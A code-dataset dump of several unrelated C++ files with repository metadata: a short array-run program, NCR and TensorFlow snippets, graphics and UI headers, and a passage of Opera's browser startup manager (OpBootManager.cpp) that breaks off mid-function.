namespace wasm #endif // _wasm_ast_hashed_h
9dcf67aa242df428f50e2ad641721b746faf4688
2176b5a7d2cf25e94faca45725dff02d6d74ae89
/steps.cpp
1a9d5cc433ecab109506bb4a711c098ea6857b6a
[]
no_license
meKhairul/test
0e9804489cdef12d2faf99ffb635963b4beacb0d
7481ae7e9a12a74e780b19ca2712fd01f00031c8
refs/heads/master
2021-06-19T06:42:07.965009
2021-02-11T17:58:09
2021-02-11T17:58:09
176,896,660
0
0
null
null
null
null
UTF-8
C++
false
false
361
cpp
steps.cpp
#include<iostream> #include<cmath> #include<algorithm> using namespace std; int main() { int i,j,n,count=1,m=1,k; cin>>n; int a[n]; for (i=0;i<n;i++) { cin>>a[i]; } for (i=0,j=1;i<n&&j<n;i++,j++) { if (a[i]<=a[j]) { count=count+1; if (count>m) { m=count; } } else { count=1; } } cout<<m<<endl; return 0; }
57dceda5b330d8be2d43912eccfd12fde7a142f9
7045bb4f95ada6e1669a3cd9520681b7e548c319
/Meijer/Platform-Core-Patch/Remote Console Manager/src/rap/actions/PushbackImmediateIntervention.cpp
49e87843eb473c122811b1115e4333958e53d003
[]
no_license
co185057/MeijerTESTSVN
0ffe207db43c8e881fdbad66c1c058e25fe451f5
3a3df97b2decc1a04e6efe7c8ab74eff5409f39f
refs/heads/master
2023-05-30T00:19:36.524059
2021-06-10T08:41:31
2021-06-10T08:41:31
375,576,064
0
0
null
null
null
null
UTF-8
C++
false
false
2,395
cpp
PushbackImmediateIntervention.cpp
// $Header: /Integration_Customer/Meijer/CURRENT_DEV/Platform-Core-Patch/remote console manager/src/rap/actions/PushbackImmediateIntervention.cpp 3 10/21/08 4:08p Sm133076 $ /* * @(#)PushbackImmediateIntervention.cpp $Revision: 3 $ $Date: 10/21/08 4:08p $ * * Copyright 2004 by NCR Corporation, * * All rights reserved. * * This software is the confidential and proprietary information * of NCR Corporation. ("Confidential Information"). You * shall not disclose such Confidential Information and shall use * it only in accordance with the terms of the license agreement * you entered into with NCR. */ /* * $Log: /Integration_Customer/Meijer/CURRENT_DEV/Platform-Core-Patch/remote console manager/src/rap/actions/PushbackImmediateIntervention.cpp $ * * 3 10/21/08 4:08p Sm133076 * Patch G Migration * * 4 10/20/06 9:50a Tn185011 * Roll back to 244 * * 1 5/02/05 2:58p Tp151000 * TAR 299442 */ #include "StdAfx.h" namespace fastlane {} using namespace fastlane; #include "PushbackImmediateIntervention.h" #include "RemoteAPMgr.h" #include "RCMStateMachine.h" #include "RCMMessages.h" #include "RCMKeyValue.h" CPushbackImmediateIntervention::CPushbackImmediateIntervention() { CRCMActionBase::SetName(_T("CPushbackImmediateIntervention")); } CPushbackImmediateIntervention::~CPushbackImmediateIntervention() { } HRESULT CPushbackImmediateIntervention::Execute(bool *pResult, IMessage &) { IMODTRACE_DEVELOP(); *pResult = true; CIntervention *pIntervention = rapmgr().GetCurrentIntervention(); if (pIntervention == NULL) { ITRACE_DEVELOP(_T(__FUNCTION__) _T("No intervention in progress.")); return S_OK; } IMessage &newMsg = stateMachine().MakeAsynchCopy(*dynamic_cast<IMessage *>(pIntervention)); rapmgr().PushbackImmediateIntervention(&newMsg); return S_OK; } template <> IAction* CCreateable<CPushbackImmediateIntervention, IAction>::NewInstance() { IAction *pAction = new CPushbackImmediateIntervention; return pAction; } template <> void CCreateable<CPushbackImmediateIntervention, IAction>::ReleaseInstance(IAction *pAction) { delete pAction; } DEFINE_ACTION_CREATE_FXN(PushbackImmediateIntervention) DEFINE_ACTION_RELEASE_FXN(PushbackImmediateIntervention)
363fa7ab28143b397c30d60ac7eea6c3444c9986
11e10b8651815149a97b038537e714ea33dd0fa7
/Projects/Sandbox/Src/Scenes/TessellationScene.h
9353ca92d9342894565cbd81f518d1e3ea0c1c7d
[]
no_license
jonathan2222/RenderingSandboxD3D11
2f3a737bb3c0e417e6d3d9cb74c17c44b8c83674
8c8ed9d465af7073473cedb9d29fd6724516013b
refs/heads/main
2023-08-22T01:27:16.763543
2021-10-05T14:08:14
2021-10-05T14:08:14
338,813,002
0
0
null
null
null
null
UTF-8
C++
false
false
2,384
h
TessellationScene.h
#pragma once #include "Core/Scene.h" #include "Loaders/ModelLoader.h" #include "Renderer/Pipeline.h" #include "Renderer/Shader.h" #include "Scenes/Camera.h" namespace RS { class TessellationScene : public Scene { public: struct CameraData { glm::mat4 world = glm::mat4(1.f); glm::mat4 view = glm::mat4(1.f); glm::mat4 proj = glm::mat4(1.f); glm::vec4 info = glm::vec4(0.f); // First element if the alpha value for Phong Tessellation. }; struct PSData { glm::vec4 cameraPos = glm::vec4(0.f); glm::vec4 cameraDir = glm::vec4(0.f); glm::vec4 lightPos = glm::vec4(0.f); }; struct Vertex { glm::vec3 Position; glm::vec3 Normal; glm::vec3 Tangent; glm::vec2 UV; }; public: TessellationScene(); ~TessellationScene() = default; void Start() override; void Selected() override; void Unselected() override; void End() override; void FixedTick() override; void Tick(float dt) override; private: void ToggleWireframe(bool forceToggle); void CreateTexture(const std::string& fileName, ID3D11Texture2D*& pTexture, ID3D11ShaderResourceView*& pTextureView); void CalcTangents(std::vector<Vertex>& vertices, const std::vector<uint32>& indices); private: Shader m_TriShader; Shader m_QuadShader; ID3D11Buffer* m_pVertexBuffer = nullptr; ID3D11Buffer* m_pTriIndexBuffer = nullptr; ID3D11Buffer* m_pQuadIndexBuffer = nullptr; ID3D11Buffer* m_pVSConstantBuffer = nullptr; ID3D11Buffer* m_pHSConstantBuffer = nullptr; ID3D11Buffer* m_pDSConstantBuffer = nullptr; ID3D11Buffer* m_pPSConstantBuffer = nullptr; uint32 m_NumTriIndices = 0; uint32 m_NumQuadIndices = 0; PSData m_PSData; CameraData m_CameraData; Camera m_Camera; bool m_IsWireframeEnabled = true; Pipeline m_Pipeline; ID3D11Texture2D* m_pAlbedoTexture = nullptr; ID3D11Texture2D* m_pNormalTexture = nullptr; ID3D11Texture2D* m_pDisplacementTexture = nullptr; ID3D11Texture2D* m_pAOTexture = nullptr; ID3D11ShaderResourceView* m_pAlbedoTextureView = nullptr; ID3D11ShaderResourceView* m_pNormalTextureView = nullptr; ID3D11ShaderResourceView* m_pDisplacementTextureView = nullptr; ID3D11ShaderResourceView* m_pAOTextureView = nullptr; ID3D11SamplerState* m_pSampler = nullptr; }; }
286cbc8ad48a066da5480916cf148a72edf286af
4bcc9806152542ab43fc2cf47c499424f200896c
/tensorflow/core/kernels/data/experimental/lmdb_dataset_op.cc
80a3582b0a47cff6bb844891fac28ab6914a51fd
[ "Apache-2.0", "LicenseRef-scancode-generic-cla", "BSD-2-Clause" ]
permissive
tensorflow/tensorflow
906276dbafcc70a941026aa5dc50425ef71ee282
a7f3934a67900720af3d3b15389551483bee50b8
refs/heads/master
2023-08-25T04:24:41.611870
2023-08-25T04:06:24
2023-08-25T04:14:08
45,717,250
208,740
109,943
Apache-2.0
2023-09-14T20:55:50
2015-11-07T01:19:20
C++
UTF-8
C++
false
false
1,797
cc
lmdb_dataset_op.cc
/* Copyright 2018 The TensorFlow Authors. All Rights Reserved. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. ==============================================================================*/ #include "tensorflow/core/kernels/data/experimental/lmdb_dataset_op.h" #include <sys/stat.h> #include "tensorflow/core/framework/dataset.h" namespace tensorflow { namespace data { namespace experimental { /* static */ constexpr const char* const LMDBDatasetOp::kDatasetType; /* static */ constexpr const char* const LMDBDatasetOp::kFileNames; /* static */ constexpr const char* const LMDBDatasetOp::kOutputTypes; /* static */ constexpr const char* const LMDBDatasetOp::kOutputShapes; void LMDBDatasetOp::MakeDataset(OpKernelContext* ctx, DatasetBase** output) { OP_REQUIRES( ctx, false, errors::Unimplemented( "LMDB support is removed from TensorFlow. This API will be deleted " "in the next TensorFlow release. If you need LMDB support, please " "file a GitHub issue.")); } namespace { REGISTER_KERNEL_BUILDER(Name("LMDBDataset").Device(DEVICE_CPU), LMDBDatasetOp); REGISTER_KERNEL_BUILDER(Name("ExperimentalLMDBDataset").Device(DEVICE_CPU), LMDBDatasetOp); } // namespace } // namespace experimental } // namespace data } // namespace tensorflow
6dbde6df843387d7e24c735590dc4000047f5f2d
c1de40ab0dac5f7d6c57af64783d38940727aaf5
/openocl-1.1/libopenocl_ui-1.0/include/openocl/ui/Icon.h
8331008cd8be10cb28cbf151018ef1ae7e56c94d
[]
no_license
danielbradley/OpenOCL
28eb4c20600af32c8451a30c264bdc136c9a84ab
72c476eac140210e38a0db3758b1f7515edd0c73
refs/heads/master
2023-08-23T12:40:07.942150
2021-10-30T04:16:59
2021-10-30T04:16:59
422,778,029
0
0
null
null
null
null
UTF-8
C++
false
false
2,180
h
Icon.h
/* * Copyright (C) 1997-2005 Daniel Robert Bradley. All rights reserved. * * This software is redistributable under the terms of the GNU LGPL * (Lesser General Public License). * * I.S.Labs is a registered trademark of Daniel Robert Bradley */ #ifndef OPENOCL_UI_ICON_H #define OPENOCL_UI_ICON_H #include "openocl/ui/Selector.h" #include "openocl/ui.h" #include <openocl/base/event/EventListener.h> #include <openocl/imaging.h> namespace openocl { namespace ui { class Icon : public Selector, public openocl::base::event::EventListener { public: Icon( const openocl::base::String& name ); Icon( const openocl::base::String& name, const openocl::base::String& command ); Icon( const openocl::base::String& name, const openocl::base::String& command, const openocl::base::String& data ); ~Icon(); // public virtual methods (EventListener) virtual void deliverEvent( const openocl::base::event::Event& anEvent ); // public virtual methods (Component) virtual void processEvent( const openocl::base::event::Event& anEvent ); virtual void doLayout( const openocl::ui::GraphicsContext& gc ); // public methods void setImage( const openocl::ui::OffscreenImage* anImage ); void setImage( const openocl::ui::OffscreenImage& anImage ); void setImageId( const openocl::base::String& anImageId ); void setLabel( const openocl::base::String& aLabel ); void setMenu( PopupMenu& aPopupMenu ); void setMaxPreferredWidth( unsigned int width ); void setMinPreferredWidth( unsigned int width ); // public virtual constant methods (Component) virtual bool draw( GraphicsContext& gc ) const; virtual Dimensions getPreferredDimensions( const GraphicsContext& gc, unsigned int width, unsigned int height ) const; // public constant methods int getPreferredX() const; int getPreferredY() const; private: void init(); void obtainIconImage( const GraphicsContext& gc ) const; Region* picture; Region* text; unsigned int minPreferredWidth; unsigned int maxPreferredWidth; openocl::base::String* imageId; const OffscreenImage* image; IconText* iconText; bool selected; bool hoverOver; bool pressed; static unsigned int size; }; };}; #endif
69263be5108b8f0bdaf93b181f9b480424da2b9d
202b96b76fc7e3270b7a4eec77d6e1fd7d080b12
/adjunct/quick/application/OpBootManager.cpp
4ad4ee1d0fb897f096545760a0ff232a5edff3bb
[]
no_license
prestocore/browser
4a28dc7521137475a1be72a6fbb19bbe15ca9763
8c5977d18f4ed8aea10547829127d52bc612a725
refs/heads/master
2016-08-09T12:55:21.058966
1995-06-22T00:00:00
1995-06-22T00:00:00
51,481,663
98
66
null
null
null
null
UTF-8
C++
false
false
40,392
cpp
OpBootManager.cpp
/* -*- Mode: c++; tab-width: 4; indent-tabs-mode: t; c-basic-offset: 4 -*- * * Copyright (C) 1995-2012 Opera Software AS. All rights reserved. * * This file is part of the Opera web browser. It may not be distributed * under any circumstances. * * @author spoon / Patricia Aas (psmaas) */ #include "core/pch.h" #include "adjunct/quick/application/OpBootManager.h" #include "adjunct/desktop_util/string/stringutils.h" #include "adjunct/desktop_util/sessions/opsessionmanager.h" #include "adjunct/desktop_util/prefs/CorePrefsHelpers.h" #include "adjunct/desktop_util/search/searchenginemanager.h" #include "adjunct/desktop_util/sessions/SessionAutoSaveManager.h" #include "adjunct/desktop_util/sessions/opsession.h" #include "modules/locale/src/opprefsfilelanguagemanager.h" #include "modules/prefsfile/prefsfile.h" #include "adjunct/quick/ClassicApplication.h" #include "adjunct/quick/managers/KioskManager.h" #include "adjunct/quick/WindowCommanderProxy.h" #include "adjunct/quick/dialogs/PasswordDialog.h" #include "adjunct/quick/dialogs/SimpleDialog.h" #include "adjunct/quick/models/DesktopWindowCollection.h" #include "modules/gadgets/OpGadgetManager.h" #include "adjunct/quick/managers/DesktopExtensionsManager.h" #include "adjunct/desktop_pi/DesktopGlobalApplication.h" #include "adjunct/quick/managers/CommandLineManager.h" #include "adjunct/quick_toolkit/widgets/OpWorkspace.h" #include "adjunct/quick/managers/DesktopGadgetManager.h" #include "adjunct/quick/windows/PanelDesktopWindow.h" #include "adjunct/quick/managers/SpeedDialManager.h" #include "adjunct/quick/managers/DesktopExtensionsManager.h" #include "adjunct/quick/managers/ManagerHolder.h" #include "adjunct/m2_ui/dialogs/MailStoreUpdateDialog.h" #include "adjunct/m2/src/engine/engine.h" #include "adjunct/quick/dialogs/CheckForUpgradeDialogs.h" #include "modules/prefs/prefsmanager/collections/pc_core.h" #include "modules/prefs/prefsmanager/collections/pc_tools.h" #include "adjunct/desktop_util/resources/ResourceSetup.h" #include "adjunct/desktop_util/resources/ResourceUtils.h" #include "adjunct/desktop_util/file_utils/FileUtils.h" #include "modules/windowcommander/OpWindowCommanderManager.h" #include "adjunct/desktop_pi/DesktopOpSystemInfo.h" #include "adjunct/quick/windows/BrowserDesktopWindow.h" #include "adjunct/desktop_util/filelogger/desktopfilelogger.h" #include "modules/util/OpSharedPtr.h" #ifdef SELFTEST #include "modules/selftest/optestsuite.h" #endif // SELFTEST #ifdef AUTO_UPDATE_SUPPORT #include "adjunct/quick/managers/AutoUpdateManager.h" #endif // AUTO_UPDATE_SUPPORT #ifdef ENABLE_USAGE_REPORT # include "adjunct/quick/usagereport/UsageReport.h" #endif // ENABLE_USAGE_REPORT #ifdef LIBSSL_AUTO_UPDATE #define LIBSSL_AUTO_UPDATE_TIMEOUT 604800 // 1 week #define LIBSSL_AUTO_UPDATE_TASKNAME "SSL Autoupdate" #endif // LIBSSL_AUTO_UPDATE #ifdef _DDE_SUPPORT_ # include "platforms/windows/userdde.h" // DDEHandler extern DDEHandler* ddeHandler; #endif // _DDE_SUPPORT_ #ifdef _MACINTOSH_ #include "platforms/mac/File/FileUtils_Mac.h" #include "modules/skin/OpSkinManager.h" #endif #define FULLSCREEN_TIMEOUT 100 #define OPERA_NEXT_PAGE UNI_L("http://redir.opera.com/www.opera.com/portal/next") #define OPERA_UPGRADE_PAGE UNI_L("http://redir.opera.com/www.opera.com/upgrade/") #define OPERA_FIRST_RUN_PAGE UNI_L("http://redir.opera.com/www.opera.com/firstrun/") OpBootManager::OpBootManager(ClassicApplication& application, OpStartupSequence& startup_sequence) : m_autosave_manager(NULL) , m_default_language_manager(NULL) #ifndef AUTO_UPDATE_SUPPORT , m_updates_checker(NULL) #endif , m_exiting(FALSE) , m_startup_sequence(&startup_sequence) , m_ui_window_listener(NULL) , m_authentication_listener(NULL) , m_application(&application) , m_fullscreen_timer(NULL) , m_country_checker(NULL) , m_previous_ccs(CCS_DONE) , m_delay_customizations_timer(NULL) { OP_PROFILE_METHOD("Constructed boot manager"); m_autosave_manager = OP_NEW(SessionAutoSaveManager, ()); if (!m_autosave_manager) return; CorePrefsHelpers::ApplyMemoryManagerPrefs(); ConfigureWindowCommanderManager(); ConfigureTranslations(); } OpBootManager::~OpBootManager() { g_windowCommanderManager->SetGadgetListener(NULL); g_windowCommanderManager->SetAuthenticationListener(NULL); OP_DELETE(m_authentication_listener); g_windowCommanderManager->SetUiWindowListener(NULL); OP_DELETE(m_ui_window_listener); #ifndef AUTO_UPDATE_SUPPORT OP_DELETE(m_updates_checker); #endif OP_DELETE(m_autosave_manager); // must be deleted after closing windows because of possible callbacks OP_DELETE(m_default_language_manager); OP_DELETE(m_fullscreen_timer); OP_DELETE(m_country_checker); OP_DELETE(m_delay_customizations_timer); } void OpBootManager::ConfigureWindowCommanderManager() { m_ui_window_listener = m_application->CreateUiWindowListener(); g_windowCommanderManager->SetUiWindowListener(m_ui_window_listener); m_authentication_listener = m_application->CreateAuthenticationListener(); g_windowCommanderManager->SetAuthenticationListener(m_authentication_listener); } void OpBootManager::ConfigureTranslations() { OpString lang; lang.Set(g_languageManager->GetLanguage()); if(!lang.Compare(UNI_L("en"))) { // no need to load a duplicate of the language we already use return; } if ((m_default_language_manager = OP_NEW(OpPrefsFileLanguageManager, ())) != NULL) { OpFile default_lngfile; OpString filename; filename.Set(g_desktop_op_system_info->GetLanguageFolder(UNI_L("en")).CStr()); filename.Append(UNI_L(PATHSEP)); filename.Append(DESKTOP_RES_DEFAULT_LANGUAGE); OP_STATUS err = default_lngfile.Construct(filename, OPFILE_LOCALE_FOLDER); OP_ASSERT(OpStatus::IsSuccess(err)); // FIXME: do what if err is bad ? PrefsFile* language_file = OP_NEW_L(PrefsFile, (PREFS_LNG)); TRAP(err, language_file->ConstructL()); OP_ASSERT(OpStatus::IsSuccess(err)); // FIXME: do what if err is bad ? TRAP(err, language_file->SetFileL(&default_lngfile)); OP_ASSERT(OpStatus::IsSuccess(err)); // FIXME: do what if err is bad ? TRAP(err, ((OpPrefsFileLanguageManager*)m_default_language_manager)->LoadTranslationL(language_file)); language_file = NULL; // Taken over by LM if (OpStatus::IsError(err)) { // Smells like a memory leak m_default_language_manager = NULL; } } } void OpBootManager::PostSaveSessionRequest() { m_autosave_manager->PostSaveRequest(); } BOOL OpBootManager::IsSDI() { return g_pcui->GetIntegerPref(PrefsCollectionUI::SDI) == 1; } #ifdef LIBSSL_AUTO_UPDATE void OpBootManager::InitSLLAutoUpdate() { m_ssl_autoupdate_task.SetListener(this); m_ssl_autoupdate_task.InitTask(LIBSSL_AUTO_UPDATE_TASKNAME); m_ssl_autoupdate_task.AddScheduledTask(LIBSSL_AUTO_UPDATE_TIMEOUT); } #endif // LIBSSL_AUTO_UPDATE void OpBootManager::InitWindow() { // Ensure we have a WINDOW_TYPE_BROWSER or WINDOW_TYPE_DOCUMENT window to process messages DesktopWindow* activewindow = g_application->GetActiveDesktopWindow(); if( !activewindow || (activewindow->GetType() != OpTypedObject::WINDOW_TYPE_BROWSER && activewindow->GetType() != OpTypedObject::WINDOW_TYPE_DOCUMENT) ) { // We will have a non-active window if we start iconified if( !g_application->GetDesktopWindowCollection().GetDesktopWindowByType(OpTypedObject::WINDOW_TYPE_BROWSER) ) { g_application->GetBrowserDesktopWindow(); } } // for SDI and tabbed, make sure there is no empty workspaces OpVector<DesktopWindow> browser_windows; g_application->GetDesktopWindowCollection().GetDesktopWindows(OpTypedObject::WINDOW_TYPE_BROWSER, browser_windows); if (!g_pcui->GetIntegerPref(PrefsCollectionUI::AllowEmptyWorkspace)) { for(UINT32 i = 0; i < browser_windows.GetCount(); i++ ) { #ifdef DEVTOOLS_INTEGRATED_WINDOW if (!browser_windows.Get(i)->IsDevToolsOnly()) #endif // DEVTOOLS_INTEGRATED_WINDOW { OpWorkspace* workspace = browser_windows.Get(i)->GetWorkspace(); if (!workspace->GetActiveDesktopWindow()) { g_application->CreateDocumentDesktopWindow(workspace); } } } } } OP_STATUS OpBootManager::StartCountryCheckIfNeeded() { // this function must be called before StartBrowser OP_ASSERT(!m_startup_sequence->IsBrowserStarted()); int previous_ccs = g_pcui->GetIntegerPref(PrefsCollectionUI::CountryCheck); if (previous_ccs == CCS_IN_PROGRESS_FIRST_CLEAN_RUN || previous_ccs == CCS_IN_PROGRESS_FIRST_RUN) { // Opera decided in previous session that country check is needed, but // it was not finished nor timed out (session was closed or crashed). // Country check will be restarted in this session (unless this is // selftests or Watir run). // Save previous state as it contains information about original run type // which will be needed to execute pending upgrades. m_previous_ccs = static_cast<CountryCheckState>(previous_ccs); } else { // Start country check only if current region setting is based // on country code reported by OS (which we don't trust) and if // this is is first run with fresh profile or an upgrade from // version of Opera without region-based customizations. // Otherwise just return OK - customization files will be loaded // using current region setting. if (!g_region_info->m_from_os) return OpStatus::OK; Application::RunType runtype = DetermineFirstRunType(); if (runtype != Application::RUNTYPE_FIRSTCLEAN) { if (runtype != Application::RUNTYPE_FIRST) return OpStatus::OK; OperaVersion elevensixty; RETURN_IF_ERROR(elevensixty.Set(UNI_L("11.60.01"))); if (GetPreviousVersion() >= elevensixty) return OpStatus::OK; } } // Disable country check if Opera is running selftests or Watir to ensure // stable environment during tests. If you want to run tests with delayed // customizations use -delayedcustomizations <sec> command line option. #ifdef SELFTEST if (g_selftest.suite->DoRun()) return OpStatus::OK; #endif // SELFTEST if (g_commandline_manager->GetArgument(CommandLineManager::WatirTest)) return OpStatus::OK; OpAutoPtr<CountryChecker> country_checker(OP_NEW(CountryChecker, ())); RETURN_OOM_IF_NULL(country_checker.get()); RETURN_IF_ERROR(country_checker->Init(this)); RETURN_IF_ERROR(country_checker->CheckCountryCode(COUNTRY_CHECK_TIMEOUT)); if (m_previous_ccs == CCS_DONE) { CountryCheckState ccs; if (DetermineFirstRunType() == Application::RUNTYPE_FIRSTCLEAN) ccs = CCS_IN_PROGRESS_FIRST_CLEAN_RUN; else ccs = CCS_IN_PROGRESS_FIRST_RUN; RETURN_IF_LEAVE(g_pcui->WriteIntegerL(PrefsCollectionUI::CountryCheck, static_cast<int>(ccs))); RETURN_IF_LEAVE(g_prefsManager->CommitL()); } m_country_checker = country_checker.release(); OP_PROFILE_MSG("Country check started"); return OpStatus::OK; } void OpBootManager::CountryCheckFinished() { OP_PROFILE_MSG("Country check finished"); if (IsExiting()) return; // too late, but CountryCheck pref is set, so country check will be restarted in the next session if (m_country_checker->GetStatus() == CountryChecker::CheckSucceded) { OpStringC new_cc = m_country_checker->GetCountryCode(); OP_ASSERT(new_cc.HasContent()); // should not be empty if country check succeeded OpStringC au_cc = g_pcui->GetStringPref(PrefsCollectionUI::AuCountryCode); if (new_cc != au_cc) { // This will trigger update of path to turbosettings.xml file (in AutoUpdateManager::PrefChanged) TRAPD(status, g_pcui->WriteStringL(PrefsCollectionUI::AuCountryCode, new_cc)); } if (OpStatus::IsSuccess(ResourceUtils::UpdateRegionInfo(new_cc)) && g_region_info->m_changed) { OpStatus::Ignore(FileUtils::UpdateDesktopLocaleFolders(true)); } } // no longer needed OP_DELETE(m_country_checker); m_country_checker = NULL; // If already started then load customizations. Otherwise LoadCustomizations will be called from StartBrowser. if (m_startup_sequence->IsBrowserStarted()) { OpStatus::Ignore(LoadCustomizations()); } } /*********************************************************************************** ** ** StartBrowser ** ** ** ***********************************************************************************/ OP_STATUS OpBootManager::StartBrowser() { OP_ASSERT(m_startup_sequence->HasBrowserStartSetting()); // Can only start the browser once, check with IsBrowserStarted(); if (!m_startup_sequence->HasBrowserStartSetting()) return OpStatus::ERR; if (!m_country_checker) RETURN_IF_ERROR(LoadCustomizations()); if (DetermineFirstRunType() != Application::RUNTYPE_NORMAL) { #ifdef WEBSERVER_SUPPORT if (g_webserver_manager && g_webserver_manager->IsFeatureAllowed()) { // install the root service on first run, ignore errors OpStatus::Ignore(g_desktop_gadget_manager->InstallRootService()); #ifdef USE_COMMON_RESOURCES ResourceSetup::InstallUniteServices(); // install services from custom builds #endif // USE_COMMON_RESOURCES g_webserver_manager->LoadDefaultServices(); // install our regular services } #endif // WEBSERVER_SUPPORT } // This call MUST be before any DesktopWindow instances are opened to allow listeners to be established g_desktop_global_application->OnStart(); // See DSK-340253. if (DetermineFirstRunType() == Application::RUNTYPE_FIRST) { OperaVersion elevenfifty; RETURN_IF_ERROR(elevenfifty.Set(UNI_L("11.50.01"))); if (GetPreviousVersion() < elevenfifty) { PrivacyManager::Flags flags; flags.Set(g_pcui->GetIntegerPref(PrefsCollectionUI::ClearPrivateDataDialog_CheckFlags)); bool wand_sync = flags.IsSet(PrivacyManager::WAND_PASSWORDS_SYNC); bool wand_dont_sync = flags.IsSet(PrivacyManager::WAND_PASSWORDS_DONT_SYNC); bool bookmarks_vis_time = flags.IsSet(PrivacyManager::BOOKMARK_VISITED_TIME); bool all_windows = flags.IsSet(PrivacyManager::ALL_WINDOWS); bool certs = flags.IsSet(PrivacyManager::CERTIFICATES); bool searchfield = flags.IsSet(PrivacyManager::SEARCHFIELD_HISTORY); flags.Set(PrivacyManager::BOOKMARK_VISITED_TIME, wand_dont_sync); flags.Set(PrivacyManager::ALL_WINDOWS, bookmarks_vis_time); flags.Set(PrivacyManager::CERTIFICATES, all_windows); flags.Set(PrivacyManager::SEARCHFIELD_HISTORY, certs); flags.Set(PrivacyManager::WEBSTORAGE_DATA, searchfield); flags.Set(PrivacyManager::WAND_PASSWORDS_DONT_SYNC, wand_sync); TRAPD(rc, g_pcui->WriteIntegerL(PrefsCollectionUI::ClearPrivateDataDialog_CheckFlags, flags.Get())); TRAP(rc, g_prefsManager->CommitL()); } } /*//FIXME DUNNO if this really is needed... huibk // make sure we have a BROWSER window or WINDOW_TYPE_DOCUMENT to process messages BOOL isSDIandCommandlineURLs = IsSDI() && (commandline_urls && commandline_urls->GetCount() > 0); DesktopWindow* activewindow = GetActiveDesktopWindow(); if (!isSDIandCommandlineURLs && (!activewindow || (activewindow->GetType() != WINDOW_TYPE_BROWSER && activewindow->GetType() != WINDOW_TYPE_DOCUMENT))) { #ifdef _MACINTOSH_ GetBrowserDesktopWindow(TRUE, FALSE, TRUE); #else GetBrowserDesktopWindow(TRUE, FALSE, IsSDI()); #endif // _MACINTOSH_ }*/ #ifdef _MACINTOSH_ // Possibly make a link to the new preferences folder location, if this is not an AppStore build (see DSK-334964) if (VER_NUM_MAJOR < 12 && !g_pcui->GetIntegerPref(PrefsCollectionUI::DisableOperaPackageAutoUpdate)) OpFileUtils::LinkOldPreferencesFolder(); // Color Schemes no longer supported on Mac, except through Personas. Otherwise turn off. if (!g_skin_manager->HasPersonaSkin()) { g_pccore->WriteIntegerL(PrefsCollectionCore::ColorSchemeMode, 0); g_skin_manager->SetColorSchemeMode(OpSkin::COLOR_SCHEME_MODE_NONE); } #endif // _MACINTOSH_ if (m_startup_sequence->GetBrowserStartSettingRunType() == Application::RUNTYPE_FIRSTCLEAN) { // Open a welcome to opera page ShowFirstRunPage(FALSE); } else { // Recover from a previous session OP_PROFILE_METHOD("Loaded and initialized previous session"); WindowRecoveryStrategy strategy = CommandLineManager::GetInstance()->GetArgument(CommandLineManager::NoSession) ? Restore_NoWindows : m_startup_sequence->GetWindowRecoveryStrategy(); RecoverOpera(strategy); } if (m_startup_sequence->GetBrowserStartSettingRunType() == Application::RUNTYPE_FIRST) { // Open a thank you for upgrading page ShowFirstRunPage(TRUE); } // open crash feedback page OpStringC url = g_pcui->GetStringPref(PrefsCollectionUI::CrashFeedbackPage); if (url.HasContent()) { g_application->OpenURL(url,MAYBE,YES,NO); TRAPD(err,g_pcui->WriteStringL(PrefsCollectionUI::CrashFeedbackPage,UNI_L(""))); } m_startup_sequence->SetBrowserStarted(); m_startup_sequence->DestroyBrowserStartSetting(); InitWindow(); #ifdef M2_MERLIN_COMPATIBILITY UpdateMail(); #endif // M2_MERLIN_COMPATIBILITY #ifdef _DDE_SUPPORT_ if(ddeHandler) // In StartupSeq? { ddeHandler->Start(); //start accepting requests } #endif // _DDE_SUPPORT_ if(!CommandLineManager::GetInstance()->GetArgument(CommandLineManager::NoWin)) { // ok to send in an empty collection here ExecuteCommandlineArg(CommandLineManager::GetInstance()->GetUrls()); } OpStatus::Ignore(SetOperaRunning(TRUE)); if( (HasFullscreenStartupSetting()) || CommandLineManager::GetInstance()->GetArgument(CommandLineManager::MediaCenter) || CommandLineManager::GetInstance()->GetArgument(CommandLineManager::Fullscreen) ||(KioskManager::GetInstance()->GetEnabled() && !KioskManager::GetInstance()->GetKioskNormalScreen()) ) { KioskManager::GetInstance()->SetEnableFilter(FALSE); BOOL handled = g_input_manager->InvokeAction(OpInputAction::ACTION_ENTER_FULLSCREEN); if (handled) { g_desktop_global_application->OnStarted(); } else { m_fullscreen_timer = OP_NEW(OpTimer, ()); m_fullscreen_timer->SetTimerListener(this); m_fullscreen_timer->Start(FULLSCREEN_TIMEOUT); } KioskManager::GetInstance()->SetEnableFilter(TRUE); } if(KioskManager::GetInstance()->GetEnabled()) g_application->PrepareKioskMode(); // This setting is read in CreateSessionWindows() but should // be available on startup. DestroyStartupSetting(); #ifdef LIBSSL_AUTO_UPDATE InitSLLAutoUpdate(); #endif // LIBSSL_AUTO_UPDATE #ifdef AUTO_UPDATE_SUPPORT g_autoupdate_manager->Activate(); #else if (IsUpgradeCheckNeeded()) { PerformUpgradesCheck(FALSE); } #endif //!AUTO_UPDATE_SUPPORT // g_secman_instance->InitializeTables(); // Needed by the SecurityInformationDialog to check if a url is in the intranet range. #ifdef __OEM_EXTENDED_CACHE_MANAGEMENT const OpStringC filter = g_pcnet->GetStringPref(PrefsCollectionNetwork::NeverFlushTrustedServers); if (filter.IsEmpty()) { OpString trusted; trusted.Set("help.opera.com"); TRAPD(err, g_pcnet->WriteStringL(PrefsCollectionNetwork::NeverFlushTrustedServers, trusted)); OP_ASSERT(OpStatus::IsSuccess(err)); // FIXME: do what if err is bad ? } #endif // __OEM_EXTENDED_CACHE_MANAGEMENT if (CommandLineManager::GetInstance()->GetArgument(CommandLineManager::StartMail)) g_application->GoToMailView(IndexTypes::UNREAD_UI); m_url_player.Play(); // When running watir tests always load opera:debug if (CommandLineManager::GetInstance()->GetArgument(CommandLineManager::WatirTest)) { DocumentDesktopWindow *ddw = g_application->GetActiveDocumentDesktopWindow(); if (ddw) { if (!ddw->HasDocumentInHistory()) { // DSK-361642: Make sure we ignore the modifier keys when opening opera:debug g_application->GoToPage(UNI_L("opera:debug"), FALSE, FALSE, FALSE, 0, static_cast<URL_CONTEXT_ID>(-1), TRUE); } } } // If customizations are already loaded then we should start Account Manager, // otherwise it will be started in LoadCustomizations. if (!m_country_checker && !m_delay_customizations_timer) RETURN_IF_ERROR(g_desktop_account_manager->Start()); return 